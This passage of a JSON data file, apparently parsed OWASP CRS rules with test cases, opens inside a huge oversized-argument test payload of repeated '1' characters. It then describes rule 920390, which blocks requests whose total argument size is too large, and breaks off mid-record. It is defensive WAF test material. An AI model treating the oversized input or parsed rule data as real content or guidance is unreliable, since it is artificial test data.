1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111" } ] } ], "raw_rule": { "type": "SecRule", "lineno": 824, "variables": [ { "variable": "TX", "variable_part": "TOTAL_ARG_LENGTH", "quote_type": "no_quote", "negated": false, "counter": true } ], "operator": "@eq", "operator_argument": "1", "actions": [ { "act_name": "id", "lineno": 825, "act_quote": "no_quote", "act_arg": "920390", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 826, "act_quote": "no_quote", "act_arg": "2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 827, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 828, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 829, "act_quote": "quotes", "act_arg": "Total arguments size exceeded", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 830, "act_quote": "quotes", "act_arg": "%{MATCHED_VAR_NAME}=%{MATCHED_VAR}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 831, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 832, "act_quote": "quotes", "act_arg": "language-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 833, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 834, "act_quote": "quotes", "act_arg": "attack-protocol", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 835, "act_quote": "quotes", "act_arg": "paranoia-level/1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 836, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 837, "act_quote": "quotes", "act_arg": "OWASP_CRS/PROTOCOL-ENFORCEMENT", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 838, "act_quote": "quotes", "act_arg": "capec/1000/210/272", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 839, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 840, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "chain", "lineno": 841, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": true, "operator_negated": false, "oplineno": 824 } }, { "rule_id": null, "has_tests": false, "detection": { "variables": [ { "name": "ARGS_COMBINED_SIZE", "part": "", "negated": false } ], "operator": { "type": "@gt", "argument": "%{tx.total_arg_length}", "negated": false } }, "transformations": [ "none" ], "metadata": {}, "attack_info": { "type": [], "severity": null, "tags": [] }, "test_cases": [], "raw_rule": { "type": "SecRule", "lineno": 842, "variables": [ { "variable": "ARGS_COMBINED_SIZE", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@gt", "operator_argument": "%{tx.total_arg_length}", "actions": [ { "act_name": "t", 